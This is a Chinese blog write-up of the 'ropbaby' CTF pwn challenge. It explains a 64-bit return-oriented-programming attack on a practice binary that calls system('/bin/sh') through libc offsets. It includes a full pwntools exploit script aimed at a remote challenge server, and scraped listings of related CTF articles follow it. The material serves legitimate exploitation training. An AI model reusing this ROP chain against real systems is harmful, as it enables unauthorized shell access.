CTF-PWN-ROPbaby(实验吧)

最新推荐文章于 2024-01-09 22:04:12 发布
最新推荐文章于 2024-01-09 22:04:12 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/86772691
版权

学rop的时候刷到的题,感觉很有启发于是就写下来。

本文很大程度上借鉴了如下文章:

http://wzt.ac.cn/2018/04/02/ROP/

进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。

首先我们查看ropbaby文件的保护方式

由于开了NX,shellcode的方式就不好弄了,因此我们选择rop进行溢出攻击

rop的大概思路就是,通过编程的方式,劫持程序的返回地址,将其重新导向至目标位置。我们做题的目标一般都是劫持程序运行system(/bin/sh) 。

首先程序是64位的,函数调用时,前六个参数是通过rdi,rsi,rdx,rcx,r8 和 r9进行传递的 而我们的目的是构造payload 使程序执行 system(‘/bin/sh’) 这个命令

因此我们需要做的步骤如下:

1.找到程序漏洞(即溢出点)

2.构造一个gadget,包含pop rdi | retn

3.在libc中找到/bin/sh字符串的地址,送入rdi寄存器

4.找到system函数地址,并使得程序跳转执行system函数

通过题目中给出的libc文件,我们可以轻易在终端中用如下命令找到pop rdi|retn的地址

ROPgadget --binary libc-2.23.so --only "pop|ret"

 

将这个地址记下,我们将ropbaby进行分析

其中nptr是我们输入的一个字符串,而savedregs题目中是以int64声明,即最多输入8个字节,就会溢出,这就是我们需要的溢出点,因此我们可以考虑对memcpy函数劫持。

strings -tx libc-2.23.so | grep "/bin/sh"

 这一行命令让我们找到/bin/sh在libc中的地址

由于程序允许我们查找system的地址,因此我们考虑找到system函数的偏移

objdump -T libc-2.23.so | grep "system"

 

0x45390即为system的偏移

所以我们可以构造payload='a’ * 8 + gadget_address + bin_address + system_address 

 借鉴了上述文章作者的exp如下:

from pwn import *
tar = remote('106.2.25.7', '8004')
print(tar.recv())
tar.send('2' + '\n')
tar.send('system' + '\n')
sys_addr = int(tar.recvline()[29:], 16)
print ("[+]system_addr: "+hex(sys_addr))
base_addr = sys_addr - 0x45390
sh_addr = base_addr + 0x18cd17
print ("[+]binsh: "+hex(sh_addr))
gadget_addr = base_addr + 0x21102 
payload = 'a' * 8 + p64(gadget_addr) + p64(sh_addr) + p64(sys_addr)
tar.sendline('3')
tar.recvuntil('Enter bytes to send (max 1024): ')
tar.sendline('32')
tar.sendline(payload)
tar.interactive()

 

SuperGate
关注
专栏目录
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1536
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
实验吧 溢出题目
qq_41071646的博客
07-18 970
题目链接点击打开链接 这是一道windows下的溢出 拖入ida 我们找到一个可以数组溢出的地方 这里我盗用一下 一个朋友的图 我们可以看出来 *p 和b数组差了0x10 (偏移一位代表一个字节) 那么中间也就隔了4个int 我们输入第五个int值的时候就代表我们就是改变的*p 里面的值 当去访问 *p里面的地址的时候 就是我们输入的值 题意明确表示...
shiyanbar-ropbaby
qq_35661990的博客
11-28 301
之前去成都“参观”天府杯导致感冒,颓废了好几天。。 先看一下文件类型和程序保护 开了NX和PIE,栈不可执行和地址随机化,看来不能用shellcode了,就像题目提示的用ROP。(FORTIFY说是会对栈溢出进行保护,但是这里感觉没有体现出来) __int64 __fastcall main(__int64 a1, char **a2, char **a3) { signed in...
CTF必备技能丨Linux Pwn入门教程——ROP技术(下)
dfdhxb995397的博客
07-19 351
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有...
CTF-PWN-栈溢出-基本ROP-【ret2syscall】
llovewuzhengzi的博客
11-21 307
发现这里有个move %rbp %rsp,那么如果之前存储的rbp合适的话,那么可以继续ROP,rbp应该为在syscall调用前的前十六个字节,因为还要有pop rbp和pop rbx得抵消掉。64位的系统调用号放在rax 传参依次是 RDI、RSI、RDX、R10、R8、R9 (和64位函数传参一样)如果发现start和end相同时,重写输入,否则返回输入的数据所在数组的一个start位置所在的字节。32的系统调用号与64位的不大一样 使用的时候最好百度一下。这里的sys_read存在很明显的溢出。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Elieen:使用JSON配置CTF-Pwn中的Docker容器.zip
最新发布
06-19
pwn_dockers:pwn类配置 project_path:[nullable] docker相关资源的文件夹,也是最后Dockerfile生成的文件夹 filename:二进制文件名字 docker_username:docker中运行程序的用户名 image_name:镜像文件名称,...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
rop demo完整用例
07-16
本文是借助maven搭建的一个rop框架,以及一个简单的测试用例,供大家学习分享。如果发现不对的地方,希望大家留言提出,
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1359
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
ctf pwn 萌新学习记录 基本rop(题目来自Wiki)
weixin_73481933的博客
01-04 1579
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
0ctf2017-babypwn
CharlesGodX的博客
09-10 844
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
实验吧_ROPBABY
weixin_44681716的博客
05-04 408
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA 提取码:qbp9 实验步骤 首先检验ropbaby的保护机制 发现栈是no canary found,我们可以进行栈溢出。 首先对文件进行静态分析 ...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 589
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
1.实验吧_ropbaby(西普杯CTF)_onegadget
Jc
05-26 431
分析 1.先查看文件位数,安全机制 2.查看strings,调用函数(特别注意常见的函数) 漏洞点 EXP from pwn import * context.log_level = "debug" p = process('./ropbaby') p.recvuntil(': ') p.sendline('2') p.recvuntil('Enter symbol: ') p.send...
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 793
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
ctfd-pwn赛题收集
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值